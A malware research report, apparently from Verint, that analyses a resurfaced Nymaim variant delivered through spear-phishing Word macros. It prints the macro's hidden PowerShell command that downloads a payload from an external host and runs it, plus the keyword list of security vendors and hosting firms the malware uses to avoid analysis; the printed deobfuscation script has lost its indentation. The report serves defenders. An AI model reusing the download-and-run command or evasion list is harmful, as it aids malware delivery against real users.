Verint’s Cyber Research team has discovered an unknown variant of the Nymaim malware family, a group of threats that are also capable of downloading various malicious payloads onto the affected device, ranging from Ransomware to Banking Trojans.
Nymaim is a malware family that was prevalent in 2013 but has recently reemerged on the threat landscape. In the past, it seems the vast majority of attacks were associated with file encoding malware as the final payload but we must stress that Nymaim serves a method of delivering multiple types of malicious payload.
As mentioned above, having first appeared in 2013, Nymaim’s popularity significantly dropped in the years that followed. However, there has been a significant increase in the number of attacks seen over the past 6 months (specifically, a 63% increase in attacks compared to 2015)
What does the new variant bring to the table?
As can only be expected in the current cyber landscape, the new variant of Nymaim possesses an arsenal of new features and capabilities that have not yet been seen, including new delivery mechanisms, obfuscation methods, PowerShell usage and even an interesting form of “anti-security solution/analysis” blacklisting. These are described in detail further on in the report.
Unlike the 2013 version, which was distributed via drive-by-downloads as the victims visited compromised websites, the new reincarnation has been shown to use a different vector of attack. Spear phishing campaigns, with emails containing a malicious Microsoft Word .DOC file as an attachment, are used to socially engineer victims into initiating the infection. Our analysis of the newest variant also matches this trend.
While perhaps not the most alarming finding Verint’s research team has ever seen, this Nymaim variant serves as substantial evidence of two significant trends:
- The reemergence and evolution of the Nymaim family. Our discovery shows that not only is the malware family definitely back in action, it has gone through some dramatic changes meaning that it deserves renewed attention.
- This is another perfect example of how even relatively widespread threats are employing significantly more advanced methods of attack, distribution and obfuscation that not that long ago, would have been found in only the most advanced and targeted threats. This trend is just getting stronger and means that “advanced” threats will continue to affect a wider range of victims than ever before.
Alongside significantly deeper analysis into the malware’s payloads, we will continue to monitor the progression and spreading of the malware itself and will naturally publish any additional significant findings.
Breaking down the discovery
As mentioned above, recent reports show that Nymaim is mainly distributed via spear phishing campaigns which target high level managers. Our analyzed sample fits this modus operandi, as can be seen in the following example. The email message includes the recipient’s job title in the subject line (“Vice President – Human Resources”), while the body of the message includes such details as the recipient’s full name and office address. The subject discussed in the email seems relevant to HR personnel.
Figure 1: email with subject: Vice President – Human Resources [recipient name] Draft documents endorsed for your review [Random digits]
Carefully examining the email, we see that although it was received from Brian Grimes, a reply to the email will be redirected to firstname.lastname@example.org.
When opening the attachment, it looks like a classic phishing attempt, which tries to convince the user to enable macro since the document is ‘protected’:
Figure 2: Example attachment
Analyzing the document’s strings presents its structure. It contains macro code at stream A3, as follows:
Figure 3: oledump structure of the attachment
Extracting the VBA macro code from the document indicates that the code is obfuscated, as can be seen from the following excerpt:
Figure 4: obfuscated VBA macro downloader excerpt
Macro code, obfuscation changes
What initially caught our attention was the Macro payload. Previous articles about Nymaim’s obfuscation technique observed a ROT obfuscation mechanism, but what we had on our hands was different – no ROT order gave us sensible strings, so we went on to deobfuscate the somewhat-short Macro code to reveal its gems.
In-effect, obfuscation is done through two types of tactics – one is an effort to obfuscate strings in particular, the other is to make Macro methods virtually unreadable and cumbersome for the reverse engineer.
String de-obfuscation is implemented by calculating a cyclic group of numbers that will lead to the correct reordering of the string. The key for the replacement of characters is comprised by two numbers. De-obfuscation of strings can be enacted using the following script:
# The Cutter function is slicing a single, selected, character out of the original obfuscated string
def cutter(tstring, int1):
pstring = tstring[int1:(int1 + 1)]
# encompassing the next-in-cycle-character
def fremainder(int1, length):
intn = (int1 – (length * (int1 // length)))
# deobfuscating string
def decrypt(int1, int2, tstring):
decrypted = “”
fremainder_int = fremainder(int1, len(tstring))
while len(decrypted) < len(tstring):
decrypted = decrypted + cutter(tstring, fremainder_int)
fremainder_int = fremainder((int2 + fremainder_int), len(tstring))
if __name__ == “__main__”:
# exemplified with d(127, 271, “.h2cwm/d/yii:iexp//mt.owev.w/pn/tomscgat1m”)
num1 = 127
num2 = 271
obfstring = “.h2cwm/d/yii:iexp//mt.owev.w/pn/tomscgat1m”
decrypt(num1, num2, obfstring)
A major modification within the downloader’s methods was the order of execution and implementation of first stage drop. First, it initiates a PowerShell routine in order to download a first-stage payload.
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden –command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile(‘http://silkflowersdecordesign.com/admin/worddata.dat’, $f);(New-Object -com WScript.Shell).Exec($f)
Another stage of pre-execution is a very common maneuver to test for connectivity and to deliver the C&C with external-facing IP address of the target.
The macro is crafting a GET request to: “https://www.maxmind.com/geoip/v2.1/city/me”, using a Referrer value of “https://www.maxmind.com/en/locate-my-ip-address”, and a User-Agent value of “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)”
The user-agent in-place was implemented in Internet Explorer 10 platform preview (2011), a somewhat peculiar choice for an up-to-date variant – may point to the origin of the mechanism’s code.
Blacklisting to prevent detection/prevention by Cyber-Security tools
Next, it reads out the response result from the maximind.com query and looks for possible blockers/analysis-tools by comparing it to an array of strings of interest:
“FORTINET”, “CISCO”, “TREND MICRO”, “RACKSPACE”, “HOSTING”, “STRONG TECHNOLOGIES”, “DATA CENTER”, “IRON PORT”, “BLUECOAT”, “BLUE COAT”, “VMVAULT”, “MESSAGELABS”, “MICROSOFT”, “MIMECAST”, “LEASEWEB”, “BLACKOAKCOMPUTERS”, “ESET, SPOL”, “SERVER”, “DATACENTER”, “BITDEFENDER”, “DATACENTRE”, “OVH SAS”, “NFORCE”, “TRENDMICRO”, “ANONYMOUS”, “CLOUD”, “AMAZON”, “HISPEED.CH”, “HOSTED”, “IRONPORT”, “PALO ALTO”, “PROOFPOINT”, “SECURITY”, “TRUSTWAVE”, “FORCEPOINT”, “DEDICATED”, “HETZNER”, “FIREEYE”, “ZSCALER”
It presents a mix of anti-analysis efforts it implements right outside-the-box, as a pre-emptive check before downloading the first-stage payload. That is to say – if the sub-string is found to be within the response – it won’t approach the function of downloading the first stage payload off ‘silkflowersdecordesign.com’.